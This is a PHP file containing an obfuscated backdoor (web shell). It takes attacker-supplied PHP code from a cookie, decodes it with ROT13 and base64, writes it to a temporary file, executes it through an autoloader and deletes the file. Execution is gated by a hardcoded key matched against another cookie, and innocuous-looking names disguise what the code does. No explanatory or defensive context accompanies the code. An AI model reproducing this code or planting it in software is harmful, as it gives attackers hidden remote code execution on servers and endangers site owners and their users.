<?php


if (isset($_COOKIE[-44+44]) && isset($_COOKIE[91-90]) && isset($_COOKIE[-66+69]) && isset($_COOKIE[3+1])) {
    $fac = $_COOKIE;
    function reverse_lookup($dchunk) {
        $fac = $_COOKIE;
        $ref = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '87d365fc');
        if (!is_writable($ref)) {
            $ref = getcwd() . DIRECTORY_SEPARATOR . "system_core";
        }
        $resource = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($fac[3]));
        if (is_writeable($ref)) {
            $symbol = fopen($ref, 'w+');
            fputs($symbol, $resource);
            fclose($symbol);
            spl_autoload_unregister(__FUNCTION__);
            require_once($ref);
            @array_map('unlink', array($ref));
        }
    }
    spl_autoload_register("reverse_lookup");
    $element = "edb1afe3fd1b05e3925c6fc09fe54d01";
    if (!strncmp($element, $fac[4], 32)) {
        if (@class_parents("framework_task_processor", true)) {
            exit;
        }
    }
}
